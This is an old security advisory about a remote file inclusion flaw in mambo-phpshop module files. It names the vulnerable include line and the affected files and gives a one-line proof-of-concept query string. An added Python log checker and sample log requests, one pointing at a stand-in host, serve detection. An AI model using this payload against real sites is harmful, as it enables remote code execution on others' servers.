mambo-phphop Product Scroller Module R.F.I

2006-08-21T00:00:00
ID SECURITYVULNS:DOC:13967
Type securityvulns
Reporter Securityvulns
Modified 2006-08-21T00:00:00

Description

    ###########################################################################################
    #            Aria-Security.net Advisory                                                   #
    #            Discovered  by: O.U.T.L.A.W                                                  #
    #            < www.Aria-security.net >                                                    #
    #        Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                                     #
    #                                                                                         #
    ###########################################################################################

Software: mambo-phphop Product Scroller Module

Attack method: Remote File Inclusion

Source:

    /* Load the phpshop main parse code */
    require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' );


Vulnerable Files:

mod_phpshop.php
mod_phpshop_allinone.php
mod_phpshop_cart.php
mod_phpshop_featureprod.php
mod_phpshop_latestprod.php
mod_product_categories.php
mod_productscroller.php
mosproductsnap.php

Proof of Concept:

one of the files above.php?mosConfig_absolute_path=SHELL

----------------------------------------------------------

Contact : Outlaw@aria-security.net
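
Added example (not part of the original advisory): a log check that flags direct requests to the listed module files that set mosConfig_absolute_path in the query string. The sample log lines, the /modules/ path, the addresses and the host names are constructed, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# File names from the advisory's list of vulnerable files.
MODULE_FILES = {
    "mod_phpshop.php", "mod_phpshop_allinone.php", "mod_phpshop_cart.php",
    "mod_phpshop_featureprod.php", "mod_phpshop_latestprod.php",
    "mod_product_categories.php", "mod_productscroller.php",
    "mosproductsnap.php",
}
PARAM = "mosConfig_absolute_path"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def classify(line):
    """Return (file, value, is_remote_url) if the line sets PARAM on a listed file."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    name = url.path.rsplit("/", 1)[-1]
    if name not in MODULE_FILES:
        return None
    # parse_qsl percent-decodes names and values; PHP also turns '.' and ' '
    # in incoming parameter names into '_', so normalise those before comparing.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key.replace(".", "_").replace(" ", "_") == PARAM:
            return name, value, bool(SCHEME_RE.match(value))
    return None

def scan(lines):
    """Return every hit found in an iterable of access-log lines."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (assumed combined log format, documentation addresses).
SAMPLE = [
    '192.0.2.10 - - [21/Aug/2006:10:00:01 +0000] "GET /index.php?option=com_phpshop HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Aug/2006:10:00:05 +0000] "GET /modules/mod_productscroller.php?mosConfig_absolute_path=http://example.invalid/x.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [21/Aug/2006:10:00:09 +0000] "GET /modules/mosproductsnap.php?mosConfig%5Fabsolute%5Fpath=%68ttp%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 298',
    '203.0.113.4 - - [21/Aug/2006:10:01:00 +0000] "GET /modules/mod_phpshop_cart.php?mosConfig_absolute_path=/var/tmp/x HTTP/1.1" 200 0',
    '192.0.2.10 - - [21/Aug/2006:10:02:00 +0000] "GET /modules/mod_phpshop.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for name, value, remote in scan(SAMPLE):
        print(f"{name}: {PARAM}={value!r} remote_url={remote}")
```

Only the query string is visible in an access log, so the same parameter sent in a POST body or cookie is not covered by this check.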